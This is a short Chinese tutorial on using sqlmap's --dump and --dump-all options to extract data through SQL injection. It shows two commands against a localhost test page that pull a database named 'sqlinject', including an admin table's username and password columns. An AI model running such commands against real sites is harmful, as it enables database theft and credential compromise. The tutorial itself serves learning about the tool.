SQLMAP脱裤

之前就有一个朋友问，咋使用sqlmap脱裤。然后我丢了一个参数给他，他好像懵逼懵逼的。今天又有一个哥们儿在群里问，行吧。就直接教一下。

其实很简单。

--dump这个参数就是用来脱裤的哟。如果你要拖整个表的话你可以加个-all(--dump-all)

CODE:

sqlmap.py -u "http://127.0.0.1/index.php?id=1" --dump -D sqlinject -T admin -C "id,username,password"

脱出数据如下所示：

仅一个文件。就是你选定了的数据。

那么我们加all呢？（PS：此时可以把那些字段都给去掉。）

CODE：

sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D sqlinject --dump-all

 可见如下是三个文件。

这三个文件是啥呢？解惑便是下图所示。